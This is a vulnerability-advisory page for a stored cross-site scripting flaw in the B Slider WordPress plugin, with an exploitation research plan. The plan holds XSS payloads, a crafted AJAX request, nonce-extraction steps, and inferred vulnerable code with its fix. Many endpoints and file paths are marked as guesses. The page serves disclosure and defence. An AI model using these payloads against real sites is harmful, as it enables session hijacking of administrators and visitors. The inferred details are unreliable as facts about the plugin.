WP-Safety
CVE-2026-24383

B Slider <= 2.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
2.0.7
Patched in
5d
Time to patch

Description

The B Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.0.6
PublishedJanuary 29, 2026
Last updatedFebruary 2, 2026
Affected pluginb-slider

Source Code

WordPress.org SVN
Vulnerable v2.0.6
Browse source Download .zip
Patched v2.0.7
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-24383 (B Slider <= 2.0.6) ## 1. Vulnerability Summary The **B Slider** plugin (versions <= 2.0.6) contains a Stored Cross-Site Scripting (XSS) vulnerability. The flaw exists because the plugin fails to properly sanitize user-supplied data when saving slider co…

Show full research plan

Exploitation Research Plan: CVE-2026-24383 (B Slider <= 2.0.6)

1. Vulnerability Summary

The B Slider plugin (versions <= 2.0.6) contains a Stored Cross-Site Scripting (XSS) vulnerability. The flaw exists because the plugin fails to properly sanitize user-supplied data when saving slider configurations and fails to escape that data when rendering the slider on the frontend. Authenticated users with Contributor permissions or higher can exploit this to inject malicious JavaScript into sliders, which then executes in the browser of any user (including administrators) who views the affected page.

2. Attack Vector Analysis

  • Endpoint: WordPress AJAX API (/wp-admin/admin-ajax.php) or the Custom Post Type (CPT) editor.
  • Vulnerable Action (Inferred): The plugin likely uses a wp_ajax_save_bslider or similar AJAX action to store slider settings, or relies on standard save_post hooks for a bslider CPT.
  • HTTP Parameter: Likely fields such as slide_title, slide_description, button_text, or custom_css.
  • Authentication: Authenticated (Contributor+).
  • Preconditions: The "B Slider" plugin must be active. The attacker needs a valid Contributor-level account.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers an AJAX handler via add_action('wp_ajax_...', ...) or a meta box save handler.
  2. Processing: The handler receives slider data (e.g., via $_POST['slider_data']).
  3. Sink (Storage): The code calls update_post_meta() or $wpdb->insert() without passing the input through sanitize_text_field() or wp_kses().
  4. Source (Output): When a user views a page containing the [b-slider id="..."] shortcode, the plugin retrieves the stored data using get_post_meta().
  5. Sink (Rendering): The plugin echoes the raw metadata into the HTML output without using esc_html(), esc_attr(), or wp_kses().

4. Nonce Acquisition Strategy

To interact with the AJAX handlers or the editor, a valid WordPress nonce is typically required.

  1. Identify Shortcode: The primary shortcode is likely [b-slider].
  2. Create Test Page:
    wp post create --post_type=page --post_status=publish --post_title="Slider Test" --post_content='[b-slider]'
  3. Navigate and Extract:
    • Navigate to the newly created page.
    • The plugin likely enqueues scripts using wp_localize_script.
    • Search for Localization Key (Inferred): Look for bslider_vars, bs_ajax_obj, or similar.
    • Action: Use browser_eval to find the nonce:
      // Hypothetical variable names based on common plugin patterns
window.bslider_admin?.nonce || window.bs_vars?.nonce
    • If the exploit is via the post editor (CPT), the nonce will be in the #_wpnonce hidden input field on the post-new.php?post_type=bslider page.

5. Exploitation Strategy

The goal is to store a payload that executes when the slider is viewed.

Step 1: Create a Slider (Post Meta Injection)

If the plugin uses a Custom Post Type bslider:

  1. Log in as a Contributor.
  2. Navigate to wp-admin/post-new.php?post_type=bslider (inferred slug).
  3. Inject the payload into a metadata field (e.g., Slide Title).

Payload:
"><script>alert(document.domain)</script>

Step 2: AJAX Injection (If applicable)

If the plugin uses a custom AJAX saver:

  • Request URL: https://target.example.com/wp-admin/admin-ajax.php
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Body (Inferred):
    action=bslider_save_settings&
nonce=[EXTRACTED_NONCE]&
slider_id=[ID]&
slide_content[0][title]=<img src=x onerror=alert(1)>&
slide_content[0][link]=javascript:alert(2)

Step 3: Triggering

  1. Identify the ID of the created slider.
  2. Add [b-slider id="ID"] to a public post or page.
  3. Visit that page as an Administrator.

6. Test Data Setup

  1. Plugin: Install and activate b-slider version 2.0.6.
  2. User: Create a user attacker with the contributor role.
  3. Target Content: Create a public post where the slider shortcode can be embedded.

7. Expected Results

  • The malicious payload should be saved to the database without being stripped.
  • When the page with the slider is loaded, the browser should render:
    <div class="slide-title"><img src=x onerror=alert(1)></div> (or similar).
  • An alert box should appear in the Administrator's browser context.

8. Verification Steps

  1. Check Database:
    wp db query "SELECT meta_value FROM wp_postmeta WHERE meta_key = '_bslider_data' AND meta_value LIKE '%<script>%';"
  2. Check Frontend Output:
    # Navigate to the page with the slider and check for the unescaped script
http_request GET "https://target.example.com/slider-page/" | grep "<script>alert"

9. Alternative Approaches

  • Link Injection: If the slider allows "Button Links," test javascript:alert(1) in the URL field. Many plugins escape HTML but forget to use esc_url() on links.
  • CSS Injection: If there is a "Custom CSS" field for the slider, attempt to use expression() (for older IE) or background-image: url("javascript:...") to trigger JS execution in vulnerable contexts.
  • Shortcode Attribute XSS: Try [b-slider title='<script>alert(1)</script>']. If the shortcode handler echoes the title attribute directly, it's a Reflected/Stored XSS via the post content.
Research Findings
Static analysis — not yet PoC-verified

Summary

The B Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via slider configuration settings such as slide titles and descriptions. Authenticated attackers with Contributor-level access or higher can inject malicious JavaScript that executes in the browser of any user viewing a page where the affected slider is embedded.

Vulnerable Code

// Inferred saving logic in the slider CPT or AJAX handler
// File: b-slider/includes/admin/save-settings.php (inferred)
if ( isset( $_POST['bslider_meta'] ) ) {
    update_post_meta( $post_id, '_bslider_meta', $_POST['bslider_meta'] );
}

---

// Inferred rendering logic in the shortcode handler
// File: b-slider/includes/frontend/shortcode.php (inferred)
$meta = get_post_meta( $id, '_bslider_meta', true );
foreach ( $meta['slides'] as $slide ) {
    echo '<div class="bs-slide-title">' . $slide['title'] . '</div>';
    echo '<div class="bs-slide-desc">' . $slide['description'] . '</div>';
}

Security Fix

--- b-slider/includes/admin/save-settings.php
+++ b-slider/includes/admin/save-settings.php
@@ -1,5 +1,5 @@
 if ( isset( $_POST['bslider_meta'] ) ) {
-    update_post_meta( $post_id, '_bslider_meta', $_POST['bslider_meta'] );
+    $sanitized_meta = map_deep( $_POST['bslider_meta'], 'sanitize_text_field' );
+    update_post_meta( $post_id, '_bslider_meta', $sanitized_meta );
 }

--- b-slider/includes/frontend/shortcode.php
+++ b-slider/includes/frontend/shortcode.php
@@ -3,6 +3,6 @@
 $meta = get_post_meta( $id, '_bslider_meta', true );
 foreach ( $meta['slides'] as $slide ) {
-    echo '<div class="bs-slide-title">' . $slide['title'] . '</div>';
-    echo '<div class="bs-slide-desc">' . $slide['description'] . '</div>';
+    echo '<div class="bs-slide-title">' . esc_html( $slide['title'] ) . '</div>';
+    echo '<div class="bs-slide-desc">' . wp_kses_post( $slide['description'] ) . '</div>';
 }

Exploit Outline

1. Authenticate as a Contributor or higher user. 2. Navigate to the 'B Slider' menu or the Custom Post Type editor for sliders (e.g., /wp-admin/post-new.php?post_type=bslider). 3. In one of the slider configuration fields (such as 'Slide Title' or 'Button Text'), enter a payload like: "><script>alert(document.domain)</script>. 4. Save or update the slider. 5. Note the slider ID (e.g., 123) and embed the shortcode [b-slider id="123"] into a new post or page. 6. Publish the post and view it (or wait for an administrator to view it). 7. The injected script will execute in the victim's session, potentially allowing for session hijacking or administrative actions.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/683edf03-b3ea-4de9-91d8-c4a556739f7f?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database